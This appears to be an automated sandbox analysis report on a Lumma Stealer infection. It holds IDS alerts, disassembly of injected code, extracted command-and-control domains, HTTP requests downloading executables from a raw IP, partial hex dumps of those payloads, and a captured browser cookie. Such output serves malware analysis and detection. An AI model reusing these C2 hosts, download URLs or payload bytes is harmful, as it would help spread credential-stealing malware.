Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 3568C09Bh	7_2_0041A360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 9ABDB589h	7_2_00438330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], C0A4C970h	7_2_00440330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [esi+eax+000000ACh]	7_2_00429C7C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+eax]	7_2_0043CCB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], B62B8D10h	7_2_0043CCB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	7_2_00418D6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	7_2_00418D6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, eax	7_2_0041D570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esi+10h], ecx	7_2_0042B503
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	7_2_0042B503
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 3568C09Bh	7_2_00417502
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 3E416E49h	7_2_00439D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, 00000001h	7_2_00418602
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 9ABDB589h	7_2_004247C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 9ABDB589h	7_2_004247C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], FD743AC4h	7_2_00438FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 4E66B5A3h	7_2_004387C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [eax+ebx], 30303030h	7_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [eax+ebx], 20202020h	7_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ecx	7_2_0041102F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], cl	7_2_0042B0EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [eax+edi*8], B62B8D10h	7_2_004230A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, ecx	7_2_0040F0B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	7_2_00428140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx]	7_2_00439940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+esi+25h]	7_2_00408960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then push esi	7_2_0041F963
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [esi+edi+02h], 0000h	7_2_004269E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebp, edx	7_2_004269E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp+0Ch]	7_2_00401277
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	7_2_00407210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	7_2_00432A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then push eax	7_2_004222ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], B62B8D10h	7_2_00436350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], B282C971h	7_2_00421379
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [eax], cl	7_2_004293B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [ecx], ax	7_2_0043BBB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [ebp-18h]	7_2_0043BBB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	7_2_00424C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebp, word ptr [eax]	7_2_0043FCC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, ecx	7_2_004194AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [edi+eax-01h], 00000030h	7_2_004014B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [esi+eax+000000ACh]	7_2_00429C75
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	7_2_00404D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, edx	7_2_00419D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [ebx], ax	7_2_0041C513
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [ebx], ax	7_2_0041C52A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+44D9AB7Fh]	7_2_00423DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	7_2_00405DE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebp, eax	7_2_0040A5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-000000EBh]	7_2_00438580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ecx	7_2_00411DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then push eax	7_2_0043B65F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, ebp	7_2_00423E07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [esi+edi+02h], 0000h	7_2_004266F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebp, edx	7_2_004266F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+08h]	7_2_004366F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+7517AB4Fh]	7_2_004366F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	7_2_00420750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], B62B8D10h	7_2_00438700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx+08h]	7_2_0040FF28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [eax+ebp*8], B62B8D10h	7_2_00426FD0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2057284 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (knifedxejsu .cyou) : 192.168.11.20:51454 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057285 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI) : 192.168.11.20:49727 -> 104.21.19.177:443
Source: Network traffic	Suricata IDS: 2057285 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI) : 192.168.11.20:49720 -> 104.21.19.177:443
Source: Network traffic	Suricata IDS: 2057285 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI) : 192.168.11.20:49711 -> 104.21.19.177:443
Source: Network traffic	Suricata IDS: 2057285 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI) : 192.168.11.20:49712 -> 104.21.19.177:443
Source: Network traffic	Suricata IDS: 2057285 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI) : 192.168.11.20:49730 -> 104.21.19.177:443
Source: Network traffic	Suricata IDS: 2057285 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI) : 192.168.11.20:49729 -> 104.21.19.177:443
Source: Network traffic	Suricata IDS: 2057285 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI) : 192.168.11.20:49724 -> 104.21.19.177:443
Source: Network traffic	Suricata IDS: 2057285 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI) : 192.168.11.20:49725 -> 104.21.19.177:443
Source: Network traffic	Suricata IDS: 2057285 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI) : 192.168.11.20:49728 -> 104.21.19.177:443
Source: Network traffic	Suricata IDS: 2800029 - Severity 1 - ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass : 147.45.44.131:80 -> 192.168.11.20:49710
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.11.20:49712 -> 104.21.19.177:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.11.20:49711 -> 104.21.19.177:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49712 -> 104.21.19.177:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49711 -> 104.21.19.177:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.11.20:49729 -> 104.21.19.177:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49730 -> 104.21.19.177:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: conceszustyb.shop
Source: Malware configuration extractor	URLs: moutheventushz.shop
Source: Malware configuration extractor	URLs: respectabosiz.shop
Source: Malware configuration extractor	URLs: worddosofrm.shop
Source: Malware configuration extractor	URLs: mutterissuen.shop
Source: Malware configuration extractor	URLs: nightybinybz.shop
Source: Malware configuration extractor	URLs: bakedstusteeb.shop
Source: Malware configuration extractor	URLs: standartedby.shop
Source: Malware configuration extractor	URLs: knifedxejsu.cyou

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 07 Nov 2024 16:55:11 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Wed, 06 Nov 2024 18:13:46 GMTETag: "b000-626427a8e8d36"Accept-Ranges: bytesContent-Length: 45056Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 11 3e 9d 93 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 a4 00 00 00 0a 00 00 00 00 00 00 6a c3 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 c3 00 00 4f 00 00 00 00 e0 00 00 10 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 0c 00 00 00 fc c2 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 70 a3 00 00 00 20 00 00 00 a4 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 06 00 00 00 e0 00 00 00 08 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 01 00 00 02 00 00 00 ae 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c c3 00 00 00 00 00 00 48 00 00 00 02 00 05 00 94 22 00 00 68 a0 00 00 03 00 02 00 07 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 53 00 00 00 01 00 00 11 28 0f 00 00 0a 72 01 00 00 70 28 10 00 00 0a 6f 11 00 00 0a 0a 28 0f 00 00 0a 72 33 00 00 70 28 10 00 00 0a 6f 11 00 00 0a 0b 73 12 00 00 0a 25 6f 13 00 00 0a 06 07 6f 14 00 00 0a 7e 01 00 00 04 6f 15 00 00 0a 0c 7e 02 00 00 04 08 28 03 00 00 06 2a 1e 02 28 16 00 00 0a 2a 00 13 30 06 00 df 00 00 00 02 00 00 11 28 0f 00 00 0a 72 0e 01 00 70 28 10 00 00 0a 6f 11 00 00 0a 28 10 00 00 0a 7e 03 00 00 04 28 05 00 00 06 0a 28 0f 00 00 0a 06 6f 11 00 00 0a 0b 73 17 00 00 0a 73 18 00 00 0a 0c 08 6f 19 00 00 0a 28 0f 00 00 0a 72 0b 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1a 00 00 0a 26 08 6f 19 00 00 0a 28 0f 00 00 0a 72 2d 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1a 00 00 0a 26 08 17 6f 1b 00 00 0a 08 17 8d 19 00 00 01 25 16 07 a2 6f 1c 00 00 0a 6f 1d 00 00 0a 28 0f 00 00 0a 72 57 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1e 00 00 0a 28 0f 00 00 0a 72 71 94 00 70 28 10 00 00 0a 6f 11 00 00 0a 6f 1f 00 00 0a 14 18 8d 10 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 07 Nov 2024 16:55:12 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Wed, 06 Nov 2024 18:11:21 GMTETag: "4c200-6264271ea9617"Accept-Ranges: bytesContent-Length: 311808Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 91 33 25 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 f8 03 00 00 c6 00 00 00 00 00 00 00 d4 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 38 30 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 05 00 3c 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8c 31 04 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 5a f6 03 00 00 10 00 00 00 f8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5d 25 00 00 00 10 04 00 00 26 00 00 00 fc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 70 f0 00 00 00 40 04 00 00 5e 00 00 00 22 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 3c 41 00 00 00 40 05 00 00 42 00 00 00 80 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic	HTTP traffic detected: GET /infopage/hdt.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
Source: global traffic	HTTP traffic detected: GET /infopage/tbg9.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131

Source: Joe Sandbox View	IP Address: 147.45.44.131 147.45.44.131
Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250

Source: Joe Sandbox View	ASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49727 -> 104.21.19.177:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49711 -> 104.21.19.177:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49712 -> 104.21.19.177:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49730 -> 104.21.19.177:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49720 -> 104.21.19.177:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49729 -> 104.21.19.177:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49724 -> 104.21.19.177:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49725 -> 104.21.19.177:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49728 -> 104.21.19.177:443
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.11.20:49710 -> 147.45.44.131:80

Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131

Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIkqHLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4BSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
